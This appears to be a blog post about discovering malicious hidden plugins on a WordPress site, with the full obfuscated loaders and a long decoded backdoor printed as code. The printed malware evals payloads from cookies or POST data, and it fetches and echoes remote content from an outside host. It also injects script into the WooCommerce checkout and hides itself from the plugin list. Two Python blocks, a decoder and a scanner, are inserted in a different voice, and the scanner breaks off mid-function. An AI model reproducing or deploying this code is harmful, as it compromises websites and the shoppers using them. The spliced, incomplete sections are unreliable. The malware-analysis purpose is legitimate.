Yesterday I logged into the admin backend and saw WordPress prompting that an update was available. When I clicked through to the plugins page it simply returned a 502 timeout. The plugins page has always loaded slowly, but an outright timeout this time was baffling.
Only about 30 plugins are actually enabled; querying the status of 30 plugins should not time out.
I logged into the backend to delete the disabled plugins, and one of them failed to delete. That was probably a directory-permission problem left over from a backup I had created by hand earlier, so I logged into the server itself, and there found several directories I did not recognise. The names alone looked damn strange.
For example dyfruit, eqytutacih and so on. These directories looked very odd: with a normal plugin you can usually tell what it is at a glance, but with these I had no idea what they were, and no memory of ever installing them. That was outrageous.
Opening one of the plugins, the contents looked like this, clearly obfuscated code:
<?php
/**
 * Plugin Name: Eqytutacih
 * Plugin URI: https://sedifo760.biz/eqytutacih
 * Description: Overall population. Iceland began during the music of the Royal College of the public
 * Version: 2.8.8
 * Author: Joan Jackie
 * Author URI: https://sedifo760.biz
 * Text Domain: eqytutacih
 * License: GPL2+
 */
function shokesa_ezoboch() {
    gifocux_lekhodi();
}
$lolihyf = __DIR__ . '/lupuqop.php';
if (file_exists($lolihyf)) {
    // The second-stage file name is split into pieces to defeat simple string searches
    include(__DIR__ . "/lup" . "uqop." . "php");
}
if (function_exists("gifocux_lekhodi")) {
    $telyha = new egoshyl_pikhido();
    // thaxica_zuchiti() only checks that DB_NAME is defined, i.e. that this runs inside WordPress
    if ($telyha->thaxica_zuchiti()) {
        add_action('init', 'shokesa_ezoboch');
    }
}
The plugin's real main file should be lupuqop.php, so let's look at that file:
<?php
function jycagav_akherik($teshyfe_khebeca) {
    if (!file_exists($teshyfe_khebeca)) return false;
    $davochy = @file_get_contents($teshyfe_khebeca);
    if (!$davochy) return false;
    $davochy = substr($davochy, 3);   // drop the first 3 bytes of the fake image file
    $yfosej = ubeqeth_apinozh($davochy);
    return $yfosej;
}
function ubeqeth_apinozh($teshyfe_khebeca) {
    $adonexa = ashyruq_zhuwuji;       // the 130-character key defined below
    $ogyxewi = array();
    for ($ividoni = 0; $ividoni < strlen($adonexa); $ividoni += 2) {
        $celoma = substr($adonexa, $ividoni, 1);
        $enyxiny = substr($adonexa, $ividoni + 1, 1);
        $ogyxewi[$celoma] = $enyxiny; // pair i: replace key[i] with key[i+1]
    }
    $ururadu = strtr($teshyfe_khebeca, $ogyxewi); // character substitution ...
    $ururadu = base64_decode($ururadu);           // ... followed by base64 decoding
    return $ururadu;
}
define("ashyruq_zhuwuji", "IhPI06rmYVTge/daGumwtFxBstJG/cpNkCHSMqwpy4lyjr1lf1QkhiWsD73vnxzeUY+KiPFQcb739H5zo8A+EE2dVJvf42NOLLXUS=8nCWKAuRqjb56ZOTaoRMgXZD=9B0");
// The "image" assets/images/ohaloth.gif is the encoded next stage
$okubef = jycagav_akherik(__DIR__ . "/asse" . "ts/i" . "mage" . "s/ohal" . "oth." . "gif");
if ($okubef) {
    @eval($okubef);
}
Still obfuscated code, and nothing useful can be read off it directly, but one can guess that the jycagav_akherik function does the decryption, and that what it decrypts is the ohaloth.gif file in the images directory.
That image is not a real image; it is actually a text file. Change the eval in the last line of the code above to print, and it prints the decrypted file contents.
File contents:
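To inspect what that loader feeds to eval() without ever running it, here is a Python reimplementation of jycagav_akherik()/ubeqeth_apinozh(), added as an example and not code from the plugin or the post: it builds the same character table from the 130-character key, applies it the way strtr does, base64-decodes, and returns the plaintext. It also checks a property of the key that holds for the sample above (the key is a permutation of the base64 alphabet), and encode_payload exists only to construct a test fixture; its 3-byte header is a placeholder, since the post does not show what the real ohaloth.gif begins with.

```python
import base64

B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="

# Substitution key copied from the lupuqop.php sample above (ashyruq_zhuwuji).
KEY = ("IhPI06rmYVTge/daGumwtFxBstJG/cpNkCHSMqwpy4lyjr1lf1QkhiWsD73vnxze"
       "UY+KiPFQcb739H5zo8A+EE2dVJvf42NOLLXUS=8nCWKAuRqjb56ZOTaoRMgXZD=9B0")


def build_table(key: str) -> dict[int, str]:
    """Mirror the loop in ubeqeth_apinozh(): for each pair key[i]key[i+1],
    the ciphertext character key[i] is replaced by key[i+1]."""
    if len(key) % 2:
        raise ValueError("key must consist of character pairs")
    return {ord(key[i]): key[i + 1] for i in range(0, len(key), 2)}


def key_is_base64_permutation(key: str) -> bool:
    """True when the first and second characters of the pairs each cover the
    65-character base64 alphabet exactly once. A 130-character define()
    constant with this property is a handy signature for this loader family."""
    table = build_table(key)
    return (sorted(chr(c) for c in table) == sorted(B64_ALPHABET)
            and sorted(table.values()) == sorted(B64_ALPHABET))


def decode_payload(blob: bytes, key: str = KEY) -> bytes:
    """Reproduce jycagav_akherik(): drop the 3-byte fake image header, apply
    the table (PHP strtr with single-character pairs behaves like
    str.translate), then base64-decode. Returned for inspection, never executed."""
    body = blob[3:].decode("ascii")
    return base64.b64decode(body.translate(build_table(key)))


def encode_payload(plaintext: bytes, key: str = KEY, header: bytes = b"xxx") -> bytes:
    """Inverse transform, used here only to build a test fixture. The header is
    a constructed placeholder for whatever 3 bytes the real file starts with."""
    inverse = {ord(v): chr(k) for k, v in build_table(key).items()}
    encoded = base64.b64encode(plaintext).decode("ascii").translate(inverse)
    return header + encoded.encode("ascii")


if __name__ == "__main__":
    sample = encode_payload(b"<?php echo 'constructed sample'; ?>")  # constructed input
    print(decode_payload(sample).decode())
```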
class egoshyl_pikhido { var $jishebi = 'zhelidi.gif'; var $ythoson = 'usepir.gif'; public $xodeshu = 'ezhacap.js'; public $unetoli_izaxoce = false; public $ivihity_chazoky = false; public $ochutim_chugofi = false; var $jirocid_kihishi = null; var $fefitul_yhakhyj = null; var $ufogib = 'esutozh.gif'; var $rikunyv = 'ewegukh.png'; var $rohefys = false; public function __construct($teshyfe_khebeca = false) { if ($teshyfe_khebeca) { $this->alytash_felofuq(); } } public function alytash_felofuq() { if (!$this->elikhov_ebaniny()) { $this->opopoth_lacalur(); } } public function thaxica_zuchiti() { $ezylowy_pydorik = "DB_N" . "AME"; return defined($ezylowy_pydorik); } protected function awushif_nisubog($teshyfe_khebeca) { $shanere_ekujokh = crc32($teshyfe_khebeca); if ((PHP_INT_SIZE > 4) && ($shanere_ekujokh & 0x80000000)) $shanere_ekujokh = $shanere_ekujokh - 0x100000000; return abs($shanere_ekujokh); } protected function shadawy_ewilahy($teshyfe_khebeca) { $jomothi_sishuji = array( CURLOPT_RETURNTRANSFER => true, CURLOPT_HEADER => false, CURLOPT_FOLLOWLOCATION => true, CURLOPT_ENCODING => "", CURLOPT_USERAGENT => "Mozi" . "lla/5" . ".0 (Wi" . "ndows " . "NT 6" . ".1; Wi" . "n64;" . " x64;" . " rv:1" . "06.0)" . " Gecko" . "/2010" . "0101" . " Firef" . "ox/106" . ".0", CURLOPT_AUTOREFERER => true, CURLOPT_CONNECTTIMEOUT => 180, CURLOPT_TIMEOUT => 180, CURLOPT_MAXREDIRS => 10, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false ); $ychijih_inyreqo = curl_init($teshyfe_khebeca); curl_setopt_array($ychijih_inyreqo, $jomothi_sishuji); $shanere_ekujokh = @curl_exec($ychijih_inyreqo); if (!$shanere_ekujokh) $shanere_ekujokh = @file_get_contents($teshyfe_khebeca); return $shanere_ekujokh; } protected function oshebyl_cekhiwo($teshyfe_khebeca, $rizhamo_izhylez) { $jomothi_sishuji = ''; $ychijih_inyreqo = "explod" . "e"; $shanere_ekujokh = "trim"; $athefyh_quxozuz = "base6" . "4_dec" . "ode"; $lupethe_dichano = "gzin" . 
"flate"; $shygyxi_thibeki = $ychijih_inyreqo("\n", $teshyfe_khebeca); for ($avunype_efozote = 0; $avunype_efozote < sizeof($shygyxi_thibeki); $avunype_efozote++) { $jomothi_sishuji .= $shanere_ekujokh($shygyxi_thibeki[$avunype_efozote]); } if (!$rizhamo_izhylez) { return $lupethe_dichano($athefyh_quxozuz($jomothi_sishuji)); } $fegushy_riwobej = ''; for ($abuhoxu_rowugeg = 0; $abuhoxu_rowugeg < sizeof($rizhamo_izhylez); $abuhoxu_rowugeg += 2) { if ($abuhoxu_rowugeg % 4) { $fegushy_riwobej .= substr($jomothi_sishuji, $rizhamo_izhylez[$abuhoxu_rowugeg], $rizhamo_izhylez[$abuhoxu_rowugeg + 1]); } else { $fegushy_riwobej .= strrev(substr($jomothi_sishuji, $rizhamo_izhylez[$abuhoxu_rowugeg], $rizhamo_izhylez[$abuhoxu_rowugeg + 1])); } }; $fegushy_riwobej = $athefyh_quxozuz($fegushy_riwobej); return $fegushy_riwobej; } public function fepanuj_bemucal() { if ($this->fefitul_yhakhyj) return true; return $this->soshigy_yroxykh(); } protected function elikhov_ebaniny() { if (!$this->thaxica_zuchiti()) header("gegel3" . ":" . ($this->jirocid_kihishi + 1)); $fegushy_riwobej = "HTTP_H" . "OST"; $lupethe_dichano = strtoupper($_SERVER[$fegushy_riwobej]); $exushoq_guzhufo = $this->pesivoj_yshusig($lupethe_dichano, 5, 7); $okowocu_ojafyju = $this->pesivoj_yshusig($lupethe_dichano . $lupethe_dichano, 4, 8); if (isset($_COOKIE[$exushoq_guzhufo])) { if ($this->fepanuj_bemucal()) { $athefyh_quxozuz = md5($_COOKIE[$exushoq_guzhufo]); if (($athefyh_quxozuz == $this->fefitul_yhakhyj)) { if ((!isset($_COOKIE[$okowocu_ojafyju])) && (!isset($_POST[$okowocu_ojafyju]))) { $lolihyf = __DIR__ . 
"/assets/images/dulishy.png"; if (file_exists($lolihyf)) { $telyha = file_get_contents($lolihyf); $telyha = upeketh_cujowel($telyha); echo $telyha; @unlink($lolihyf); exit; } } else { if (isset($_COOKIE[$okowocu_ojafyju])) { $uqazuho_atehiwy = $_COOKIE[$okowocu_ojafyju]; $avunype_efozote = base64_decode($uqazuho_atehiwy); $abuhoxu_rowugeg = $this->shadawy_ewilahy($avunype_efozote); } if (isset($_POST[$okowocu_ojafyju])) { $abuhoxu_rowugeg = base64_decode($_POST[$okowocu_ojafyju]); } $this->ivihity_chazoky = $abuhoxu_rowugeg; return true; } } } } return false; } protected function opopoth_lacalur() { $jomothi_sishuji = __DIR__ . "/assets/images/" . $this->ythoson; $ychijih_inyreqo = jycagav_akherik($jomothi_sishuji); if (!$ychijih_inyreqo) return false; $this->unetoli_izaxoce = $ychijih_inyreqo; return true; } public function xikakhi_ithukeq() { $jomothi_sishuji = "dirna" . "me"; $jomothi_sishuji = $jomothi_sishuji(__FILE__); $jomothi_sishuji = str_replace("\\", "/", $jomothi_sishuji); $ychijih_inyreqo = explode("/", $jomothi_sishuji); $ychijih_inyreqo = end($ychijih_inyreqo); $ychijih_inyreqo = $ychijih_inyreqo . "/" . $ychijih_inyreqo . ".php"; return $ychijih_inyreqo; } public function zofeber_uvyreha() { $jomothi_sishuji = "wpyii" . "2/wp" . "yii2" . ".php"; return $jomothi_sishuji; } public function fesikhe_suzhage() { $jomothi_sishuji = "pxcel" . "Page_" . "c01002"; return $jomothi_sishuji; } public function izhigyc_omizikh() { $jomothi_sishuji = "6048" . "00"; return $jomothi_sishuji; } public function uhibifa_fiweqif() { $jomothi_sishuji = "YII_" . "WWW_" . "DIR"; return $jomothi_sishuji; } public function xigohaf_ycavylu() { $jomothi_sishuji = "YII_W" . "WW_P" . "ATH"; return $jomothi_sishuji; } public function pesivoj_yshusig($teshyfe_khebeca, $rizhamo_izhylez, $xyzhofy_oxoshuv) { $shanere_ekujokh = "substr"; $athefyh_quxozuz = "strlen"; $fegushy_riwobej = "qwrtp" . "sdghj" . "klzxc" . 
"vbnm"; $lupethe_dichano = "eyuoa"; $jomothi_sishuji = 0; for ($ychijih_inyreqo = 0; $ychijih_inyreqo < $athefyh_quxozuz($teshyfe_khebeca); $ychijih_inyreqo++) { $shygyxi_thibeki = ord($shanere_ekujokh($teshyfe_khebeca, $ychijih_inyreqo, 1)); $jomothi_sishuji += $shygyxi_thibeki + $shygyxi_thibeki * ($shygyxi_thibeki + $ychijih_inyreqo); } $shygyxi_thibeki = $xyzhofy_oxoshuv - $rizhamo_izhylez; $avunype_efozote = $jomothi_sishuji % $shygyxi_thibeki; $exushoq_guzhufo = $jomothi_sishuji % 2; $abuhoxu_rowugeg = ''; for ($ychijih_inyreqo = 0; $ychijih_inyreqo < $rizhamo_izhylez + $avunype_efozote; $ychijih_inyreqo++) { $okowocu_ojafyju = $ychijih_inyreqo % $athefyh_quxozuz($teshyfe_khebeca); $okowocu_ojafyju = ord($shanere_ekujokh($teshyfe_khebeca, $okowocu_ojafyju, 1)); $shygyxi_thibeki = $jomothi_sishuji + $okowocu_ojafyju + $ychijih_inyreqo + ($okowocu_ojafyju + $ychijih_inyreqo) * ($okowocu_ojafyju + $ychijih_inyreqo); $uqazuho_atehiwy = ($ychijih_inyreqo + $exushoq_guzhufo) % 2; if ($uqazuho_atehiwy) { $abuhoxu_rowugeg .= $shanere_ekujokh($fegushy_riwobej, $shygyxi_thibeki % $athefyh_quxozuz($fegushy_riwobej), 1); } else { $abuhoxu_rowugeg .= $shanere_ekujokh($lupethe_dichano, $shygyxi_thibeki % $athefyh_quxozuz($lupethe_dichano), 1); } } return $abuhoxu_rowugeg; } public function mechovy_iqichus() { $jomothi_sishuji = __DIR__ . '/assets/images/' . $this->ufogib; $ychijih_inyreqo = jycagav_akherik($jomothi_sishuji); $this->ochutim_chugofi = $ychijih_inyreqo; } public function qyborih_qonugyh() { $jomothi_sishuji = "README" . ".txt"; $ychijih_inyreqo = "base6" . "4_dec" . "ode"; $shanere_ekujokh = "strre" . "v"; $athefyh_quxozuz = "6048" . "00"; $abuhoxu_rowugeg = "unli" . "nk"; $athefyh_quxozuz = time() - intval($athefyh_quxozuz) / 7; $avunype_efozote = dirname(__FILE__); $lupethe_dichano = "file_g" . "et_co" . "ntents"; $exushoq_guzhufo = "head" . "er"; $okowocu_ojafyju = "file_p" . "ut_co" . "ntents"; $uqazuho_atehiwy = "pxcel" . "Page_" . 
"c01002"; if (isset($_COOKIE[$uqazuho_atehiwy])) return; $okubef = false; if (file_exists($avunype_efozote . '/' . $jomothi_sishuji)) { $shygyxi_thibeki = filemtime($avunype_efozote . '/' . $jomothi_sishuji); if ($shygyxi_thibeki < $athefyh_quxozuz) { $okubef = true; } else { if (!defined('YII_FORMA_OK')) { define('YII_FORMA_OK', 1); } $fegushy_riwobej = $lupethe_dichano($avunype_efozote . '/' . $jomothi_sishuji); $fegushy_riwobej = $ychijih_inyreqo($shanere_ekujokh($fegushy_riwobej)); echo $fegushy_riwobej; return; } } $okubef = true; try { $etythag_ichanyl = "SERVER" . "_ADDR"; $chugoxo_ecushaz = "HTTP_H" . "OST"; $epizhug_namibyp = "REMOTE" . "_ADD" . "R"; $qoxamec_idiwuva = "disco" . "unt:"; $vetevyk_izhoqiq = "pric" . "e:"; $bexeqyq_ewuvezh = "merc" . "hant:"; $atezoch_ebanagy = "order" . ":"; $ocifush_zyqawik = "addre" . "ss:"; $evytitu_yshovom = "127.0" . ".0.1"; $godotuv_sithity = "HTTP_" . "CLIEN" . "T_IP"; $punimuq_yzebash = "HTTP" . "_X_FO" . "RWARDE" . "D_FOR"; $dovisew_ukemisa = "#^[A" . "-Za-" . "z0-9+" . "/=]+$" . "#"; $khyvexy_uchejij = "REQUES" . "T_ME" . "THOD"; $ykhynug_sokhoda = "http" . "s://st" . "egoz" . "auru" . "s.cc" . "/wp/" . "widget" . ".txt"; $dybashi_solygel = "GET"; $zhibevy_suzhiku = "curl_" . "init"; $tacusho_okoshuv = "strea" . "m_con" . "text_c" . "reate"; $ikathog_ygiboqa = "http"; $xiluzim_kuqycyx = "metho" . "d"; $vushehy_utamyxi = 0; $zhiqizy_iwuwoni = 0; $ixothyc_fabychi = isset($_SERVER[$etythag_ichanyl]) ? $_SERVER[$etythag_ichanyl] : $evytitu_yshovom; $nufokaj_ymozhuk = isset($_SERVER[$godotuv_sithity]) ? $_SERVER[$godotuv_sithity] : (isset($_SERVER[$punimuq_yzebash]) ? 
$_SERVER[$punimuq_yzebash] : $_SERVER[$epizhug_namibyp]); $dechugi_ynetyra = $_SERVER[$chugoxo_ecushaz]; for ($utosutu_gathife = 0; $utosutu_gathife < strlen($dechugi_ynetyra); $utosutu_gathife++) { $vushehy_utamyxi += ord(substr($dechugi_ynetyra, $utosutu_gathife, 1)); $zhiqizy_iwuwoni += $utosutu_gathife * ord(substr($dechugi_ynetyra, $utosutu_gathife, 1)); } if ((isset($_SERVER[$khyvexy_uchejij])) && ($_SERVER[$khyvexy_uchejij] == $dybashi_solygel)) { $ixiqyqo_imethyg = false; if (function_exists($zhibevy_suzhiku)) { $osecopa_ixicixo = curl_init($ykhynug_sokhoda); curl_setopt($osecopa_ixicixo, CURLOPT_RETURNTRANSFER, true); curl_setopt($osecopa_ixicixo, CURLOPT_CONNECTTIMEOUT, 15); curl_setopt($osecopa_ixicixo, CURLOPT_TIMEOUT, 15); curl_setopt($osecopa_ixicixo, CURLOPT_HEADER, false); curl_setopt($osecopa_ixicixo, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($osecopa_ixicixo, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($osecopa_ixicixo, CURLOPT_HTTPHEADER, array("$qoxamec_idiwuva $vushehy_utamyxi", "$atezoch_ebanagy $zhiqizy_iwuwoni", "$vetevyk_izhoqiq $nufokaj_ymozhuk", "$bexeqyq_ewuvezh $dechugi_ynetyra", "$ocifush_zyqawik $ixothyc_fabychi")); $ixiqyqo_imethyg = @curl_exec($osecopa_ixicixo); curl_close($osecopa_ixicixo); $ixiqyqo_imethyg = trim($ixiqyqo_imethyg); if (preg_match($dovisew_ukemisa, $ixiqyqo_imethyg)) { $zihojiq_yshuvos = @$ychijih_inyreqo($shanere_ekujokh($ixiqyqo_imethyg)); if ($okubef) { @unlink($avunype_efozote . '/' . $jomothi_sishuji); $okowocu_ojafyju($avunype_efozote . '/' . 
$jomothi_sishuji, $ixiqyqo_imethyg, LOCK_EX); } if (!defined('YII_FORMA_OK')) { define('YII_FORMA_OK', 1); } echo $zihojiq_yshuvos; } } if ((!$ixiqyqo_imethyg) && (function_exists($tacusho_okoshuv))) { $urogozh_xalujoq = array( $ikathog_ygiboqa => array( $xiluzim_kuqycyx => "GET", $exushoq_guzhufo => "$qoxamec_idiwuva $vushehy_utamyxi\r\n$atezoch_ebanagy $zhiqizy_iwuwoni\r\n$vetevyk_izhoqiq $nufokaj_ymozhuk\r\n$bexeqyq_ewuvezh $dechugi_ynetyra\r\n$ocifush_zyqawik $ixothyc_fabychi" ) ); $urogozh_xalujoq = $tacusho_okoshuv($urogozh_xalujoq); $ixiqyqo_imethyg = @$lupethe_dichano($ykhynug_sokhoda, false, $urogozh_xalujoq); if (preg_match($dovisew_ukemisa, $ixiqyqo_imethyg)) { $zihojiq_yshuvos = @$ychijih_inyreqo($shanere_ekujokh($ixiqyqo_imethyg)); if ($okubef) { @unlink($avunype_efozote . '/' . $jomothi_sishuji); $okowocu_ojafyju($avunype_efozote . '/' . $jomothi_sishuji, $ixiqyqo_imethyg, LOCK_EX); } if (!defined('YII_FORMA_OK')) { define('YII_FORMA_OK', 1); } echo $zihojiq_yshuvos; } } } } catch (Exception $ogopeme_ucechex) { } } public function soshigy_yroxykh() { $jomothi_sishuji = __DIR__ . '/assets/images/zhelidi.gif'; if (!file_exists($jomothi_sishuji)) { return false; } $ychijih_inyreqo = jycagav_akherik($jomothi_sishuji); $shanere_ekujokh = "HTTP_H" . 
"OST"; $athefyh_quxozuz = $_SERVER[$shanere_ekujokh]; $abuhoxu_rowugeg = floor(strlen($ychijih_inyreqo) / 32); $shygyxi_thibeki = $this->awushif_nisubog($athefyh_quxozuz) % $abuhoxu_rowugeg; $avunype_efozote = substr($ychijih_inyreqo, $shygyxi_thibeki * 32, 32); $this->jirocid_kihishi = $shygyxi_thibeki; $this->fefitul_yhakhyj = $avunype_efozote; define('axezhod_dygefuw', $this->fefitul_yhakhyj); return $avunype_efozote; } } function yzhalaw_oxahuru($teshyfe_khebeca) { $ykofiq = strtr($teshyfe_khebeca, array('Q'=>'F', 'W'=>'C', 'E'=>'E', 'R'=>'u', 'T'=>'O', 'Y'=>'U', 'U'=>'X', 'I'=>'P', 'O'=>'N', 'P'=>'i', 'A'=>'K', 'S'=>'H', 'D'=>'Z', 'F'=>'t', 'G'=>'J', 'H'=>'9', 'J'=>'V', 'K'=>'+', 'L'=>'L', 'Z'=>'6', 'X'=>'g', 'C'=>'k', 'V'=>'Y', 'B'=>'x', 'N'=>'p', 'M'=>'R', 'q'=>'M', 'w'=>'m', 'e'=>'z', 'r'=>'j', 't'=>'s', 'y'=>'l', 'u'=>'G', 'i'=>'h', 'o'=>'a', 'p'=>'w', 'a'=>'d', 's'=>'W', 'd'=>'2', 'f'=>'v', 'g'=>'T', 'h'=>'I', 'j'=>'q', 'k'=>'Q', 'l'=>'1', 'z'=>'5', 'x'=>'n', 'c'=>'/', 'v'=>'3', 'b'=>'c', 'n'=>'8', 'm'=>'r', '1'=>'f', '2'=>'4', '3'=>'7', '4'=>'y', '5'=>'b', '6'=>'0', '7'=>'D', '8'=>'o', '9'=>'=', '0'=>'B', '='=>'S', '+'=>'A', '/'=>'e')); return $ykofiq; } function upeketh_cujowel($teshyfe_khebeca) { $ururadu = strtr($teshyfe_khebeca, array('F'=>'Q', 'C'=>'W', 'E'=>'E', 'u'=>'R', 'O'=>'T', 'U'=>'Y', 'X'=>'U', 'P'=>'I', 'N'=>'O', 'i'=>'P', 'K'=>'A', 'H'=>'S', 'Z'=>'D', 't'=>'F', 'J'=>'G', '9'=>'H', 'V'=>'J', '+'=>'K', 'L'=>'L', '6'=>'Z', 'g'=>'X', 'k'=>'C', 'Y'=>'V', 'x'=>'B', 'p'=>'N', 'R'=>'M', 'M'=>'q', 'm'=>'w', 'z'=>'e', 'j'=>'r', 's'=>'t', 'l'=>'y', 'G'=>'u', 'h'=>'i', 'a'=>'o', 'w'=>'p', 'd'=>'a', 'W'=>'s', '2'=>'d', 'v'=>'f', 'T'=>'g', 'I'=>'h', 'q'=>'j', 'Q'=>'k', '1'=>'l', '5'=>'z', 'n'=>'x', '/'=>'c', '3'=>'v', 'c'=>'b', '8'=>'n', 'r'=>'m', 'f'=>'1', '4'=>'2', '7'=>'3', 'y'=>'4', 'b'=>'5', '0'=>'6', 'D'=>'7', 'o'=>'8', '='=>'9', 'B'=>'0', 'S'=>'=', 'A'=>'+', 'e'=>'/')); return $ururadu; } $okutykh_sirugom = new egoshyl_pikhido(); function 
gifocux_lekhodi() { $xawalyw_gechune = new egoshyl_pikhido(true); if ($xawalyw_gechune->ivihity_chazoky) { @eval($xawalyw_gechune->ivihity_chazoky); if (!is_array($xawalyw_gechune->thaxica_zuchiti())) exit; } } function dugamow_betaqav() { global $wp_list_table; $jomothi_sishuji = new egoshyl_pikhido(); $ychijih_inyreqo = array($jomothi_sishuji->xikakhi_ithukeq()); $shanere_ekujokh = $wp_list_table->items; foreach ($shanere_ekujokh as $key => $val) { if (in_array($key, $ychijih_inyreqo)) { unset($wp_list_table->items[$key]); } } } function ociluch_eshynen($teshyfe_khebeca) { $jomothi_sishuji = new egoshyl_pikhido(); if (in_array($jomothi_sishuji->xikakhi_ithukeq(), array_keys($teshyfe_khebeca))) { unset($teshyfe_khebeca[$jomothi_sishuji->xikakhi_ithukeq()]); } return $teshyfe_khebeca; } function echiveq_pysejam() { $jomothi_sishuji = new egoshyl_pikhido(); $jomothi_sishuji->qyborih_qonugyh(); if (!defined('YII_FORMA_OK')) { $uqazuho_atehiwy = "pxcel" . "Page_" . "c01002"; if (isset($_COOKIE[$uqazuho_atehiwy])) return; $adonexa = __DIR__ . '/assets/js/' . $jomothi_sishuji->xodeshu; if (file_exists($adonexa)) { $ividoni = @file_get_contents($adonexa); if ($ividoni) { define('YII_FORMA_OK', 1); echo "<script>" . $ividoni . "</script>"; return; } } $adonexa = __DIR__ . '/assets/images/' . $jomothi_sishuji->rikunyv; if (file_exists($adonexa)) { $ividoni = file_get_contents($adonexa); if ($ividoni) { $ividoni = substr($ividoni, 3); $ividoni = upeketh_cujowel($ividoni); if ($ividoni) { $ividoni = base64_decode($ividoni); define('YII_FORMA_OK', 1); echo "<script>" . $ividoni . 
"</script>"; } } } } } function edewuch_azicich() { $shanere_ekujokh = new egoshyl_pikhido(); $jomothi_sishuji = $shanere_ekujokh->fesikhe_suzhage(); if (current_user_can('editor') || current_user_can('administrator')) { if (isset($_COOKIE['_wptoken']) && (!isset($_COOKIE['_jwp']))) { setcookie("__wordpressuser__", 1, time() + 600, "/"); setcookie("__wordpress_logged_in__", 1, time() + 600, "/"); $_COOKIE['__wordpressuser__'] = 1; $_COOKIE['__wordpress_logged_in__'] = 1; } $ychijih_inyreqo = $shanere_ekujokh->izhigyc_omizikh(); $ychijih_inyreqo = intval($ychijih_inyreqo) * 64; if ((function_exists("get_option")) && (function_exists("add_option")) && (function_exists("update_option"))) { $user_ip = $_SERVER['REMOTE_ADDR']; if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $user_ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } if (isset($_SERVER['HTTP_CLIENT_IP'])) { $user_ip = $_SERVER['HTTP_CLIENT_IP']; } $user_ip_md5 = md5($user_ip); $option_name = "wp_$user_ip_md5"; $option_value = get_option($option_name); $option_value_new = time(); if (!$option_value) { add_option($option_name, $option_value_new, '', 'no'); } else { update_option($option_name, $option_value_new); } } if (isset($_COOKIE[$jomothi_sishuji])) return; setcookie($jomothi_sishuji, "1", time() + $ychijih_inyreqo, "/"); } } if ($okutykh_sirugom->thaxica_zuchiti()) { add_action('pre_current_active_plugins', 'dugamow_betaqav'); add_filter('all_plugins', 'ociluch_eshynen'); add_action('admin_init', 'edewuch_azicich'); if (!defined($okutykh_sirugom->uhibifa_fiweqif())) { $okutykh_sirugom->mechovy_iqichus(); if ($okutykh_sirugom->ochutim_chugofi) @eval($okutykh_sirugom->ochutim_chugofi); } if (!defined($okutykh_sirugom->xigohaf_ycavylu())) { define($okutykh_sirugom->xigohaf_ycavylu(), 1); $adonexa = __DIR__ . 
"/README.txt"; if ((!defined($okutykh_sirugom->uhibifa_fiweqif())) || (!file_exists($adonexa))) { add_action('woocommerce_before_checkout_form', 'echiveq_pysejam'); } } if (!defined($okutykh_sirugom->uhibifa_fiweqif())) { define($okutykh_sirugom->uhibifa_fiweqif(), 1); } } else { if ($okutykh_sirugom->fepanuj_bemucal()) { $okutykh_sirugom->alytash_felofuq(); if ($okutykh_sirugom->ivihity_chazoky) { @eval($okutykh_sirugom->ivihity_chazoky); } else { @eval($okutykh_sirugom->unetoli_izaxoce); } } }
A brief analysis shows that it registers a series of hooks and also seems to contain code that intercepts cookies. The plugin does not show up on the plugins list page, but once the files are deleted and you enter the backend again, you find that several plugins have been disabled because their files no longer exist.
Browsing the backup files shows that these files were all created after September.
My guess is that these plugins were planted when I updated and replaced plugins during that period, or that an old plugin had a vulnerability that was exploited. The other WP site did not get any of these trojan files, so it should not be a server compromise. The several plugins have basically the same structure, and their directories are laid out much the same way.
dyfruit:
<?php
function etypody_kichijo($thamyje_axakopy) {
    if (!file_exists($thamyje_axakopy)) return false;
    $bemukej = @file_get_contents($thamyje_axakopy);
    if (!$bemukej) return false;
    $bemukej = substr($bemukej, 3);   // same 3-byte skip as in lupuqop.php
    $iheleku = zhutymo_anadash($bemukej);
    return $iheleku;
}
function zhutymo_anadash($thamyje_axakopy) {
    $azesuku = vufusit_ekhijoj;       // a different 130-character key, same scheme
    $cufiku = array();
    for ($ogucam = 0; $ogucam < strlen($azesuku); $ogucam += 2) {
        $fyjyzha = substr($azesuku, $ogucam, 1);
        $hususo = substr($azesuku, $ogucam + 1, 1);
        $cufiku[$fyjyzha] = $hususo;
    }
    $khunugo = strtr($thamyje_axakopy, $cufiku);
    $khunugo = base64_decode($khunugo);
    return $khunugo;
}
define("vufusit_ekhijoj", "i+eRPQACEoCS7u00XeIIOU1j=bSVfk+83hYYQNoTGnacNGjssablxqrrydhKHH8=54F9JFRDk/LO91Ki2fu742lwz6WAqWnxwBTMmgBpg3/zDPdE6mZJpZvvVytXU5cLMt");
// Here the encoded stage is disguised as a PNG instead of a GIF
$adafoja = etypody_kichijo(__DIR__ . "/ass" . "ets/i" . "mage" . "s/oth" . "ejuq." . "png");
if ($adafoja) {
    @eval($adafoja);
}
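Both samples share one shape: a loader full of split string literals, a fake .gif or .png under assets/images holding the encoded stage, a 130-character define() key, and eval() of whatever was decoded. The scanner below, added here as an example and not part of the post, walks a plugins directory and flags exactly those traits; the plugin names and file contents in build_fixture() are constructed, and the rules are triage heuristics rather than proof of compromise.

```python
import re
import tempfile
from pathlib import Path

B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
IMAGE_MAGIC = {".gif": (b"GIF87a", b"GIF89a"), ".png": (b"\x89PNG\r\n\x1a\n",)}
SPLIT_LITERAL = re.compile(r'"\s*\.\s*"')         # '"base6" . "4_dec"' -> '"base64_dec"'
EVAL_VAR = re.compile(r"\beval\s*\(\s*\$\w+")      # eval() of a variable, as in both loaders
IMAGE_AS_ARG = re.compile(r'\.(?:gif|png)"\s*\)')  # literal image path handed to a function
KEY_CONST = re.compile(r'define\s*\(\s*"\w+"\s*,\s*"([A-Za-z0-9+/=]{130})"')


def is_real_image(path: Path) -> bool:
    """Compare the file header with the magic bytes its extension promises."""
    with path.open("rb") as fh:
        head = fh.read(8)
    return any(head.startswith(m) for m in IMAGE_MAGIC.get(path.suffix.lower(), ()))


def scan_php(src: str) -> list[str]:
    """Names of the loader traits found in one PHP source text (heuristics)."""
    joined, splits = SPLIT_LITERAL.subn("", src)   # undo the string splitting first
    found = []
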